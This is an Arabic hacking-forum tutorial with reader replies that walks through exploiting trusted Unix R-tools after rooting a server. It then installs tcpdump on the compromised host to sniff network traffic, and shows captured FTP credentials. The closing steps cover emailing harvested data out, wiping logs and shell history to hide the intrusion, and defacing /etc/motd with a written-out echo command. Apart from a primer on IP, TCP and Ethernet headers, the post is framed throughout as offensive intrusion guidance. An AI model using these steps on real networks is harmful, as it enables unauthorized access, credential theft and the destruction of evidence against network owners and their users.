وبما ان السيرفر يعمل في شبكة اذا فهو جهاز موثوق لجميع الاجهزة الاخرى في نفس الشبكة . فكر شوية في كلمة "موثوق" , اكيد سمعتم عن اداوت R على يونيكس .. وقد سميت بأدوات R لانها جميعا تبدء بحرف Rكـ Rlogin و Rsh و Rcp و Rexecوغيرهم .. وما يميز هذه الادوات هو انها تعمل بمبدأ الثقة .. ودي حاجه تخدم الهاكرز في شغلهم

يتشابه rlogin مع telnet . والفرق بينهم في أن rlogin صمم لإضافة الصفة التلقائية على الاتصالات بين الأجهزة التي تثق في بعضها البعض . فمثلاً ، افترض أن عندك ثلاثة أجهزة في شبكتك الخاصة :

apples.mycompany.com

oranges.company.com

pineapples.mycompant.com

وغير كده افترض أن عندك موقعاً تحت اسم المستخدم farmer على الأجهزة الثلاثة. إذا استخدمت telnet للإتصال بـ apples ، فعليك إدخال اسم مستخدم وكلمة سر في كل مرة . ولتجنب هذا ، استخدم rlogin كالتالي :

rlogin apples

ونظراً لأن apples في نفس الشبكة .. اذا تثق بك ، فهي تتصل بك على الفور دون سؤالك عن يوزر أو باسورد . اما rsh ( اختصار remote shell ) فهو تتيح لك تنفيذ الأوامر على سيرفرات UNIX بعيدة فمثلاً ، لو اني اريد تنفيذ امر ls على الجهاز “bowser” فسأقوم بعمل الامر :

Rsh bowser Is

اما اداة Rcp فتستخدم لنسخ الملفات من جهاز اخر على الشبكة ، rcp ( اختصار remote copy ) للمزيد من المعلومات عنها اعمل امر :

man rcp

اذا الملخص انك تستطيع التسلل الى جميع الاجهزة على الشبكة ورؤية الملفات عليها .. بل والتحكم بهذه الاجهزة ايضا ... يعني بمعنى اصح انت سيطرت على الشبكة بأكملها بأستخدام ادوات R .

لكن ماذا اذ كانت الشبكة مانعةاستخدام اوامرR على الاجهزة خوفا للاستخدام السيء كهذا ؟! ...

هاتكتفي بتغيير صفحات المواقع الرئيسية زي الاطفال ؟

ولا تفكر في حل تاني يتيح لك الاستفادة من الشبكة والحصول على معلومات ذات قيمة اكبر!

كيف تستغل سيطرتك على احد سيرفرات الشبكة في الحصول على المعلومات المارة بين اجهزتها والتي يمكن ان تحتوي على معلومات غير مشفرة .. كـ اتصالات الـ Telnet و TTP و HTTP .. حيث تعتبر هذه الاتصالات غير مشفرة .

اذا انا محتاج اركب Sniffer في الشبكة لكي استطيع التقاط الباكيت المارة بها .. وبما اني root على احد السيرفرات في الشبكة .. فهذا ده سيكون نقطة الانطلاق .

ولكي تستطيع التعامل مع Sniffers يجب ان يكون عندك خلفية عن TCP\IP و Ethernet ... ولكن سأقوم بأختصار الوقت واقوم بشرح الاجزاء المهمة واللازم معرفتها قبل استخدام Sniffers وهي مكونات الـ Frames التي تنقل البيانات من جهاز لاخر على الشبكة .

كما نعلم ان اشهر بروتوكولات الاتصال هي IP و TCP , وطبعا كل بروتوكول يكون له headerخاص يميزه عن غيره من البروتوكولات .. فلو اخذنا على سبيل المثال IP headerلتحليله .. لوجدناه يحتوي على الحقول التالية :

وفيما يلي شرح موجز عن كل حقل :

Version : يستعمل في تعريف اصدار البروتوكول IP , وغالبا ما يكون IPv4 .. الا انه يتوافر فيرجن اخر لانظمة اخرى وهو IPv6

Internet Header Length : ده يعتبر اول جزء مهم في الهيدر .. وهو يحدد طول الـ header مقاسا بالبت

Type of Service : ده بيعرف نوع الخدمة المطلوبة , يعني الباكيت دي صادرة من جهاز رايحة لجهاز اخر لاي غرض.

Total Length : كما نعلم ان الـ Fream بيتكون من الحمولة او Data وفي مقدمتها الـ header اللي احنا بنشرحه حاليا , وهذا الحقل يقوم بتحديد الطول الكلي للـ header والـ Data مع بعض .

Identifier : وهي عبارة عن قيمة يقوم بوضعها المرسل .. وهي تستعمل لاعادة تجميع الرزم المجزأة في الجهاز المستقبل

Flags : دي مش عاوز افتي فيها .. لكن هي خاصة ايضا بالـ Fragmention او التجزئة واعادة تجميع الرزم المجزئة.

Fragment Offset : تستخدم في اعادة ترتيب الباكيت المجزأة ايضا

Time To Live : دي بتحدد العمر الافتراضي للباكيت لكي تصل في وجهتها .

Protocol : هنا يتم تحديد نوع البروتوكول المستخدم في طبقة الـ Transport .. يعني اما TCP او UDP

Header Checksum : هذا الحقل يستخدم للتأكد من وصول الباكيت لوجهتها بصورة سليمة .. واذا لم يكن كذلك فأنه يطلب من المرسل ان يعيد الارسال .

Source Address : عنوان الكمبيوتر المصدر

Destination Address : عنوان الكمبيوتر الوجهة

Option and padding : يستخدم هذا الحل للخيارات الاضافية .. يعني مثلا عندما كنت اقوم بتوجيه الباكيت بصورة يدوية لكي تمر على الراوترات والاجهزة التي اريدها قبل وصولها الهدف وهو مايسمى بعملية التوجيه .. حيث تستخدم في Spoofing ... فهذه الاضافات يتم وضعها في هذا الحقل .. وهناك الكثير من الراوترات تتجاهل خيارات التوجيه .

والان بعد ماانتهينا من شرح الـ IP Header نقوم بالقاء نظرة على TCP Header :

واعتقد ان الحقول واضحة وباين من اسمائها وظائف كل حقل . بعد كده نشوف UDP Header

وكما نرى انه يتكون من اربع حقول فقط .. حيث ان بروتوكول UDP لا يدعم المصافحة الثلاثية ولا يقوم بأتصال حقيقي .

كل ماتم شرحه بالاعلى هو الهيدر الذي يكون في اول الحمولة ... لكن الحمولة نفسها او المعلومات المنقولة من جهاز الى اخر اين موقعها! ..
خلونا نشوف Fream كامل وهو ماشي في في شبكة من نوع Ethernet بيكون ايه مكوناته :

Fream ده هو اهم شيء .. ولو حبينا نشوف تفاصيله فسيكون كالاتي :

اول شي الـ Fream له Header وهو يتكون من اول اربعة حقول وهي :

Preamble : وهي المقدمة والتي تخبر الجهاز الهدف عن وجود Fream قادم اليه

Destnation Address : وهو عنوان الجهاز الوجهة .. ودائما مايكون العنوان الفيزيائي

Source Address : وهو العنوان الفيزيائي للمصدر

Type : وهو يحدد نوع الايثرنت

وهنا ينتهي الـ Header .. ومايليه هو الحموله او الـ Data وهي :

IP header & TCP header وتم شرحهم فوق

Data : وهي البيانات المنقولة من المصدر للوجهة

وفي نهاية الـ Fream يأتي الذيل وهو FCS اختصار لـ Frame Check Sequence وهو يقوم بفحص الباكيت للتأكد انها وصلت بصورة سليمة ولم يحدث لها ضرر اثناء نقلها

طبعا الموضوع اكبر من ذلك .. ولكن من يريد التوسع يمكنه قراءة المزيد []

شوف احد امثلة برامج Sniffer وهو برنامج Ethereal ذو الواجهة الرسومية .. الذي يأتي مدمجا مع Linux , يعني لكي تقوم بتشغيله .. يجب ان يتوفر عندك نظام X_windows ... لاحظ معي اثناء تشغيل الاداة لالتقاط Freams في احد الشبكات :

وكما نرى انه في المربع الاول الكبير يحتوي على تفاصيل الشبكة وماتلتقطه الاداة .. اما في الخانة الثانية فهي تعرض تفاصيل عن احد Frames حيث تعرض IP header له بالاضفة الى Ethernet header و TCP header اما المربع الثالث يحتوي على Data وما يتم نقله ... وكما نلاحظ ان الاداة قامت بالتقاط احد الباسوردات غير المشفرة المارة في الشبكة . ولرؤية تفاصيل الـ header في المربع الثاني قم بالضغط على علامة + :

كما ترى .. تم توضيح الهيدر لكل بروتوكول مع جميع التفاصيل والحقول التي تم شرحها بالاعلى ... حيث يمكنك معرفة ما يدور في الشبكة ومن يتصل بمن واي جهاز ينقل الى اي جهاز وماذا ينقل .. كل ذلك تستطيع تحديده اذا كنت فاهم كويس اللي شرحته فوق

وكما ترى في الصورة بالاعلى انه تم التقاط احد جلسات Telnet الى نظام Suse والحصول على اليوزر والباسورد الغير مشفرين .

ولكن استخدام Etheral في حالة ان لك جهاز في احد الشبكات وتريد التجسس غلى الشبكة ... لكن ماذا ان كنت اخترقت احد السيرفرات في احد الشبكات .. وطبعا لن يكون هناك X_windows لتشغيل برامج رسومية . في هذه الحالة عليك البحث عن برنامج Sniffer يعمل على سطر الاوامر Shell لكي تستطيع التحكم به .

في اعتقادي انك لن تجد افضل من اداة TcpDump في هذا المجال ... والاداة تجدها في موقعها [] . قم بتنزيلها وانت على الشيل

كود:

                                 $ wget http://www.tcpdump.org/release/tcpdump-3.7.2.tar.gz       
              $        tar zxf        tcpdump-3.7.2.tar.gz
              $ cd tcpdump-3.7.2

بعد ذلك قم بعمل install للأداة .. وهذا يتم عن طريق اوامر install المعروفة على يونيكس , وهي بالترتيب :

./configure

make

make install

وبعد الانتهاء من التثبيت .. ابدء بتشغيل الاداة للتصنت على الشبكة وخلي بالك انك لازم تكون روت على السيرفر .. مع اي Sniffers Tools لازم تكون root لان الاداة تقوم بوضع كارت الشبكة للسيرفر في وضع promiscuous mode .. والوضع ده يخلي بطاقة الشبكة تقوم بجمع المعلومات المارة في الشبكة وليس المعلومات المتوجهة لها فقط . ولكن في العادة بطاقات الشبكة لا تقوم بجمع معلومات غير متوجهة اليها ابدا .. وانظمة التشغيل تمنع وضع promiscuous mode لها ... ولهذا يجب ان تكون Root حتى تقوم بتفعيل promiscuous mode وأرغام البطاقة على جمع المعلومات .

انا حاليا موجود داخل احد الشبكات .. وعندي جهازي الخاص اللي اكيد Root عليه .. وسأقوم بتشغيل اداة TcpDumpفي الشبكة واشوف ماسوف تلتقطه :

كود:

                                 [root@Net-Spider root]#        tcpdump
      tcpdump: listening on eth0
      18:21:44.584537 0.00:50:bf:7d:24:b0.553 >        0.ff:ff:ff:ff:ff:ff.553:ipx-nwlink-dgm 187
      18:21:48.289251 Net-Spider.http > 62.139.150.45.hsrp: R 0:0(0) ack        666763265 win 0
      18:21:48.311111 62.139.150.45.1025 >        server.egynet.com.eg.domain:41757+[|domain] (DF)
      18:21:48.327079 server.egynet.com.eg.domain > 62.139.150.45.1025:  41757       NXDomain*[|domain]
      18:21:48.327766 62.139.150.45.1025 > server.egynet.com.eg.domain:41758+[|domain]        (DF)
      18:21:48.338278 server.egynet.com.eg.domain >        62.139.150.45.1025:41758*[|domain]
      18:21:53.305153 arp who-has 62.139.150.33 tell 62.139.150.45
      18:21:53.305399 62.139.150.45.1025 >        server.egynet.com.eg.domain:41759+[|domain] (DF)
      18:21:53.305593 arp reply 62.139.150.33 is-at 0:1:38:0:6e:ab
      18:21:53.320954 server.egynet.com.eg.domain > 62.139.150.45.1025:  41759       NXDomain*[|domain]
      18:21:54.186510 Net-Spider.http > 62.139.150.45.1317: R 0:0(0) ack        2144796673
      win 0
      18:21:54.749783 0.00:0a:e6:9b:47:0f.4010 >        0.ff:ff:ff:ff:ff:ff.452:ipx-sap-req
      418:21:54.974257 Net-Spider.http > 62.139.150.45.1842: R 0:0(0) ack        100466689
      win 0
      18:21:56.779544 arp who-has 62.139.150.32 (89:24:1f:87:0:4) tell        62.139.150.33
      18:21:56.895997 arp who-has 62.139.150.37 (37:61:14:e3:0:45) tell       62.139.150.33
      18:21:56.896549 62.139.150.45.1025 > server.egynet.com.eg.domain:       41760+[|domain] (DF)
      18:21:56.898387 arp who-has 62.139.150.38 (fa:7:7:53:0:50) tell        62.139.150.33
      18:21:56.911184 server.egynet.com.eg.domain > 62.139.150.45.1025:  41760
      NXDomain*[|domain]
      18:21:56.911460 62.139.150.45.1025 > server.egynet.com.eg.domain:41761+[|domain]        (DF)
      18:21:56.930462 server.egynet.com.eg.domain > 62.139.150.45.1025:  41761
      NXDomain*[|domain]
      18:21:56.940963 arp who-has 62.139.150.41 (fa:7:7:55:0:50) tell        62.139.150.33
      18:21:56.943348 arp who-has 62.139.150.42 (38:1d:3c:e1:0:45) tell       62.139.150.33
      18:21:56.966058 62.139.150.45.1025 > server.egynet.com.eg.domain:       41762+[|domain] (DF)
      18:21:56.969035 arp who-has 62.139.150.44 (38:1d:3c:e2:0:45) tell       62.139.150.33
      18:21:56.971353 62.139.26.14 > 62.139.150.45: icmp: echo request
      18:21:56.971415 62.139.150.45 > 62.139.26.14: icmp: echo reply
      18:21:56.977833 server.egynet.com.eg.domain > 62.139.150.45.1025:  41762
      NXDomain*[|domain]
      18:21:56.978112 62.139.150.45.1025 > server.egynet.com.eg.domain:
      41763+[|domain] (DF)
      18:21:56.990691 server.egynet.com.eg.domain > 62.139.150.45.1025:  41763

في المثال السابق اكتفيت بكتابة Tcpdump على الشيل ثم رأيت اطنانا من البيانات على الشاشة حيث قامت الاداة بالتقاط جميع المعلومات من الشبكة .. والبيانات التي ظهرت في المثال السابق .. استغرقت من الوقت اقل من ثانية لكي تظهر , حيث اكتفيت بالسطور الاولى من النتائج . طبعا الموضوع ده مهم اذا واحد عاوز تقرير كامل عن كل مايدور في الشبكة .. ثم يقوم بتحليل النتائج فيما بعد .

ولكن اذا حبيت ان اقوم بجمع المعلومات الصادرة او المرسلة الى احد الاجهزة فقط على الشبكة .. فسأقوم بجعل اداة TcpDump بألتقاط البيانات الخاصة بهذا الجهاز فقط .. فمثلا هناك احد الاجهزة في الشبكة يحمل هذا العنوان 62.139.150.45 ... سأقوم بالتصنت عليه :

كود:

                                 [root@Net-Spider root]#        tcpdump host 62.139.150.45
      tcpdump: listening on eth0
      18:26:34.717501 Net-Spider.http > 62.139.150.45.1629: R 0:0(0) ack        1412104193
      win 0
      18:26:34.755217 62.139.150.45.1025 > server.egynet.com.eg.domain:
      20478+[|domain] (DF)
      18:26:34.769779 server.egynet.com.eg.domain > 62.139.150.45.1025:  20478
      NXDomain*[|domain]
      18:26:34.770269 62.139.150.45.1025 > server.egynet.com.eg.domain:
      20479+[|domain] (DF)
      18:26:34.780984 server.egynet.com.eg.domain > 62.139.150.45.1025:
      20479*[|domain]
      18:26:39.755155 arp who-has 62.139.150.33 tell 62.139.150.45
      18:26:39.755426 62.139.150.45.1025 > server.egynet.com.eg.domain:
      20480+[|domain] (DF)
      18:26:39.755622 arp reply 62.139.150.33 is-at 0:1:38:0:6e:ab
      18:26:39.767703 server.egynet.com.eg.domain > 62.139.150.45.1025:  20480
      NXDomain*[|domain]
      18:26:43.367501 62.139.120.199 > 62.139.150.45: icmp: echo request
      18:26:43.367585 62.139.150.45 > 62.139.120.199: icmp: echo reply
      18:26:43.367839 62.139.150.45.1025 > server.egynet.com.eg.domain:
      20481+[|domain] (DF)
      18:26:43.385210 server.egynet.com.eg.domain > 62.139.150.45.1025:  20481
      NXDomain*[|domain]
      18:26:43.403588 62.139.120.199.1108 > 62.139.150.45.135: S
      2222171529:2222171529(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
      18:26:43.403637 62.139.150.45 > 62.139.120.199: icmp: 62.139.150.45 tcp        port
      135 unreachable [tos 0xc0]
      18:26:46.028614 Net-Spider.http > 62.139.150.45.1729: R 0:0(0) ack        1771634689
      win 0
      18:26:46.393975 62.139.120.199.1108 > 62.139.150.45.135: S
      2222171529:2222171529(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
      18:26:46.394024 62.139.150.45 > 62.139.120.199: icmp: 62.139.150.45 tcp        port
      135 unreachable [tos 0xc0]
      18:26:52.530523 62.139.120.199.1108 > 62.139.150.45.135: S
      2222171529:2222171529(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
      18:26:52.530571 62.139.150.45 > 62.139.120.199: icmp: 62.139.150.45 tcp        port
      135 unreachable [tos 0xc0]

نلاحظ في المثال السابق ان الاداة قامت بتجميع الصادرة او الواردة الى الجهاز الهدف .. فكما نرى هناك اتصالات ARP خاصة بالشبكة الداخلية .. كما هناك اتصالات HTTP , ونلاحظ ايضا احد الاجهزة الاخرى يقوم بأرسال باكيت ICMP الى جهازنا الهدف .. وكأنه يقوم بعمل ping عليه .

حتى الان نحن نقوم بتحليل البروتوكولات او Header وهي مهمة لكي تستطيع ان تعرف عنواوين ومنافذ المصادر والوجهة بالاضافة الى معلومات العنونة ... ولكن كيف اقوم برؤية الـ Data او الحمولة التي تحملها الـ Freams ?

لو حبيت تشوف الـ Data فأكيد المخرجات ستكون كبيرة جدا ... ولذلك الوضع الاعتيادي لـ TcpDump الا يقوم بالتقاطها ... واذا حبيت ان تجمع هذه الحموله فقق باضافة X- الى سطر الاوامر . وبما ان المخرجات ستكون كبيرة .. فسأقوم بتحديد اكثر للباكيت المراد التقاطها .

سأقوم بجعل الاداة تقوم بألتقاط معلومات العنونة بالاضافة الى الحمولة على احد الاجهزة في الشبكة .. ولكن فقط الاتصالات الخاصة بـ FTP

كود:

                                 [root@Net-Spider root]#        tcpdump -X  host 62.139.150.45 and port 21
      tcpdump: listening on eth0
      18:34:09.716016 62.139.150.45.1141 > 66.246.35.237.ftp: P
      1431619514:1431619520(6) ack 1426596453 win
      6432 <nop,nop,timestamp 128971 218139509> (DF) [tos 0x10]
      0x0000   4510 003a 4913 4000 4006 b5ff 3e8b 962d        E..:I.@.@...>..-
      0x0010   42f6 23ed 0475 0015 5554 c7ba 5508 2265        B.#..u..UT..U."e
      0x0020   8018 1920 4809 0000 0101 080a 0001 f7cb        ....H...........
      0x0030   0d00 8b75 5041                                 ...uPA
      18:34:09.872946 66.246.35.237.ftp > 62.139.150.45.1141: P 1:53(52) ack 6        win
      5792 <nop,nop,timestamp 218161097 128971> (DF)
      0x0000   4500 0068 69d1 4000 3106 a423 42f6 23ed        [email protected]..#B.#.
      0x0010   3e8b 962d 0015 0475 5508 2265 5554 c7c0        >..-...uU."eUT..
      0x0020   8018 16a0 f8df 0000 0101 080a 0d00 dfc9        ................
      0x0030   0001 f7cb 3232                                 ....22
      18:34:09.873011 62.139.150.45.1141 > 66.246.35.237.ftp: . ack 53 win 6432
      <nop,nop,timestamp 128986 218161097> (DF) [tos 0x10]
      0x0000   4510 0034 4914 4000 4006 b604 3e8b 962d        E..4I.@.@...>..-
      0x0010   42f6 23ed 0475 0015 5554 c7c0 5508 2299        B.#.u..USER.rami
      0x0020   8010 1920 a41b 0000 0101 080a 0001 f7da        .....U."........
      0x0030   0d00 dfc9                                      ....
      18:34:10.027996 62.139.150.45.1141 > 66.246.35.237.ftp: P 6:12(6) ack 53        win
      6432 <nop,nop,timestamp 129002 218161097> (DF) [tos 0x10]
      0x0000   4510 003a 4915 4000 4006 b5fd 3e8b 962d        E..:I.@.@...>..-
      0x0010   42f6 23ed 0475 0015 5554 c7c0 5508 2299        B.#..u..UT..U.".
      0x0020   8018 1920 f755 0000 0101 080a 0001 f7ea        .....U..........
      0x0030   0d00 dfc9 4c49                                 ....LI
      18:34:10.190127 66.246.35.237.ftp > 62.139.150.45.1141: P 53:107(54) ack        12
      win 5792 <nop,nop,timestamp 218161129 129002> (DF)
      0x0000   4500 006a 69d2 4000 3106 a420 42f6 23ed        [email protected].#.
      0x0010   3e8b 962d 0015 0475 5508 2299 5554 c7c6        >..-...uU.......
      0x0020   8018 16a0 b60d 0000 0101 080a 0d00 dfe9        .".U.PASS.rami12
      0x0030   0001 f7ea 3135                                 ....15

في المثال السابق خليت الاداة تقوم بألتقاط اي معلومات FTP تصدر من الجهاز الهدف , ولكن لم تظهر النتائج علطول .. فخليت العملية مستمرة في الخلفية .. وبعد فترة قمت بالدخول لارى ان كانت الاداة التقطت شيئا .. وفعلا الجهاز الهدف وقع في المصيدة .. حيث ولج مستخدمه الى احد حسابات FTP وكما تعلمون ان اتصالات FTP لا تكون مشفرة .. ولهذا قامت TCPDump بالتقاط المعلومات .. ويمكن رؤيتها في المثال السابق بخط عريض

.

وانت مثلا ممكن تقوم بتشغيلها في الشبكة التي قمت بأختراقها ثم تجعلها تسجل فقط اتصالات FTP و Telnet والراوتر الغير مشفرة وتخلي الاداة تقوم بتسجيل البيانات في ملف في النظام .. حتى يسهل عليك سحبه ومن ثم تحليله .. ويمكنك استخدام محلل بروتوكولات في هذه العملية لكي تحول لك الخرابيط اللي فوق الى نص ASCII مقروء .

ولو عندك خلفية كويسة عن البرمجة يمكن ان تضيف كود يقوم بأرسال النتائج الى بريدك الالكتروني أول بأول .. علشان لو حصل اي شيء مثل كشف الملف او الاداة .. فتكون انت في السليم

وفي النهاية وقبل الخروج من السيرفر قم بأزالة اثرك .. وطبعا الموضوع ده اكيد عارفينه وسبق ان تم شرحه .. وبأختصار عليك ازالة اثارك من ملفات Logs الموجوده في المسار :

/var/logs

/root/.bash_history

وقم بعرض الملفات المخفية لترى ان كانت هناك ملفات history تقوم بتسجيل مايحدث وقم بأزالة اثرك منها .

وبعد ماعملت اللي عملته وخلصت كل حاجه ومسحت اثارك .. ممكن بئى تسيب رسالة انك قمت بالاختراق .. وطبعا لو السيرفر هو Web Server فالرسالة هاتكون في صفحات الموقع . او ممكن تحط رسالتك اللي عاوزها في ملف etc/motd/

وملف etc/motd/ يحتوي على جملة الترحيب اللي بتشوفها لما تتصل بالسيرفر دائما واللي ديما بتعرض اسم السيرفر ورسالة الترحيب واخر مرة دخلت فيها للسيرفر .

انت ممكن تغير الرسالة دي وتحط مكانها رسالتك .. زي مثلا :

كود:

                                 $ echo hi admin , i have a        new story for you ... your server get hack , and bleaive me .. i get the        story stright > /etc/motd

وبكده نكون انتهينا ووصلنا الى اخر الموضوع , وبصراحة ده بئى فيلم مش موضوع .. لكن الحمدلله وصلنا بخير وبدون اصابات.

************************

***********

***

*

المجاهد · 19/06/2010, 00:06

**** لك

**MdMn HaCk3r** · 25/07/2010, 08:29

لاهنت جزاك الله الف خير
تقبل مروري

**WOLF_DZ** · 25/07/2010, 22:42

يعطيك الف عافية اخي
**** لك

ANDERSON · 20/03/2011, 23:01

يسلمو كتيررررررررر..........

prosk · 25/04/2011, 03:41

يا وحش بحث في جوجل كثير وكل شيئ هنا بارك الله فيك يا بطل وهذي بووووووووووسة على جبهتك ههههههه

AnAsSrC3 · 24/10/2012, 20:13

يعطيك الف عافية اخي

abitu · 10/12/2012, 23:54

جزاك الله خيرا

algerianno · 06/09/2013, 08:31

بسم الله الرحمان الرحيم
بــــ ا ــرك الله فــــ ـيـك

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
بصلاحية روت يمكنك تعليق الأندكس على جميع المواقع في السرفر في ثانية	ApOcalYpse	[ مـنتدى حمايه المواقع والسيرفرات \| Hacking Site's & Servers ]	10	08/11/2013 15:01
اداة لسحب جميع كونفقات السيرفر ^--^	MdMn HaCk3r	[ مـنتدى حمايه المواقع والسيرفرات \| Hacking Site's & Servers ]	4	30/01/2011 08:31
حصريا : الموسوعة الكاملة لبناء الأجسام	yasMouh	[ منتدى انشغلاتنا اليوميه . . . ]	7	29/01/2011 02:16
بريطانيا تعتزم حظر جميع المواقع الإباحية	ADMINISTRATOR	[ منتدى اخبــــار الشبكـــة]	0	22/12/2010 08:00
جميع الادوات المستخدمه في ختراق المواقع	Mouna128	[ الـهاكر الـعام \| General Hacking Discussions ]	18	30/08/2010 13:31

حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف)